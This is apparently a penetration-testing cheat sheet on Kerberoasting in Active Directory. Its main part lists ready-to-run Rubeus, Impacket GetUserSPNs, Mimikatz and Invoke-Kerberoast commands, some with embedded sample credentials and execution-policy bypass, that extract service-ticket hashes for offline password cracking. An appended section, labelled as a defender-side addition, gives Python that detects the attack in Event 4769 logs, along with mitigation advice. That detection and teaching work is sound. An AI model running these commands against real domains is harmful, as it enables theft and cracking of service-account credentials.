Kerberoasting
If an account has an SPN (Service Principal Name) set, we can request a service ticket for that account (encrypted with the account's password hash) and try to crack it locally.
For Kerberos to work, the attacker's clock must be within 5 minutes of the victim's (the domain controller's).
Rubeus
.\rubeus.exe kerberoast /creduser:ecorp\morph3 /credpassword:pass1234 /nowrap
Getting SPNs
There are many ways to do it.
setspn.exe -t ecorp.local -q */*
powershell.exe -exec bypass -c "Import-Module .\GetUserSPNs.ps1"
python3 /opt/impacket/examples/GetUserSPNs.py -request -target-domain ecorp.local ecorp/morph3:[email protected] -dc-ip 10.10.10.21
Mimikatz
Listing cached tickets
Invoke-Mimikatz -Command '"kerberos::list"'
powershell.exe -c "klist"
powershell.exe -c "Import-Module C:\Users\Public\Invoke-Mimikatz.ps1; Invoke-Mimikatz -Command '"kerberos::list"'"
Extracting tickets
Invoke-Mimikatz -Command '"kerberos::list /export"'
Invoke-Kerberoast
This PowerShell script is always my go-to. It works pretty well.
powershell.exe -c "Import-Module C:\Users\Public\Invoke-Kerberoast.ps1; Invoke-Kerberoast -OutputFormat Hashcat"
powershell.exe -ep bypass -nop
Import-Module .\Invoke-Kerberoast.ps1
Invoke-Kerberoast -OutputFormat HashCat | Select-Object -ExpandProperty hash | Out-File -Encoding ASCII kerberoast.txt
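Added here as a defender-side example (not part of this cheat sheet): every service ticket the commands above request is logged on the domain controller as Security Event 4769, and a Kerberoasting run leaves two tells in that log, RC4-encrypted tickets for user-account SPNs and a single principal collecting tickets for many distinct SPNs within seconds. The accounts, SPNs and timestamps below are constructed, and the 4769 records are reduced to the fields the detection needs.

```python
"""Flag Kerberoasting tells in Windows Security Event 4769 (service ticket requested)."""
from collections import defaultdict
from datetime import datetime, timedelta

RC4_HMAC = "0x17"   # Ticket Encryption Type; AES256-CTS is 0x12

# Constructed sample 4769 records (hypothetical accounts and SPNs, not real logs).
# Fields mirror Account Name, Service Name, Ticket Encryption Type, Failure Code.
SAMPLE_4769 = [
    {"time": "2024-01-10T09:00:01", "account": "alice", "service": "WS01$", "etype": "0x12", "status": "0x0"},
    {"time": "2024-01-10T09:00:04", "account": "morph3", "service": "sqlsvc", "etype": RC4_HMAC, "status": "0x0"},
    {"time": "2024-01-10T09:00:05", "account": "morph3", "service": "iissvc", "etype": RC4_HMAC, "status": "0x0"},
    {"time": "2024-01-10T09:00:06", "account": "morph3", "service": "backupsvc", "etype": RC4_HMAC, "status": "0x0"},
    {"time": "2024-01-10T09:00:07", "account": "morph3", "service": "mssqladmin", "etype": RC4_HMAC, "status": "0x0"},
    {"time": "2024-01-10T09:30:00", "account": "bob", "service": "legacyapp", "etype": RC4_HMAC, "status": "0x0"},
]


def is_user_spn(service: str) -> bool:
    """Machine accounts (trailing $) and krbtgt are not what Kerberoasting targets."""
    return not service.endswith("$") and service.lower() != "krbtgt"


def detect(events, burst_threshold=3, window=timedelta(minutes=5)):
    """Return (rule, account, detail) tuples.
    rc4_user_spn: successful RC4 ticket for a user-account SPN; roasting tools ask
      for RC4 because it cracks far faster than AES, so this stands out in an AES domain.
    spn_burst: one principal collecting tickets for >= burst_threshold distinct
      user-account SPNs inside `window`, the "request everything at once" pattern.
    """
    alerts, per_account = [], defaultdict(list)
    for ev in sorted(events, key=lambda e: e["time"]):
        if ev["status"] != "0x0" or not is_user_spn(ev["service"]):
            continue
        if ev["etype"] == RC4_HMAC:
            alerts.append(("rc4_user_spn", ev["account"], ev["service"]))
        per_account[ev["account"]].append((datetime.fromisoformat(ev["time"]), ev["service"]))
    for account, reqs in per_account.items():
        for i, (start, _) in enumerate(reqs):   # sliding window starting at each request
            spns = {svc for t, svc in reqs[i:] if t - start <= window}
            if len(spns) >= burst_threshold:
                alerts.append(("spn_burst", account, f"{len(spns)} SPNs within {window}"))
                break
    return alerts


if __name__ == "__main__":
    for alert in detect(SAMPLE_4769):
        print(alert)
```

The same two tells point at the mitigations: restricting SPN accounts to AES (msDS-SupportedEncryptionTypes) makes RC4 requests disappear or stand out, and gMSAs or long random service passwords make a captured ticket impractical to crack.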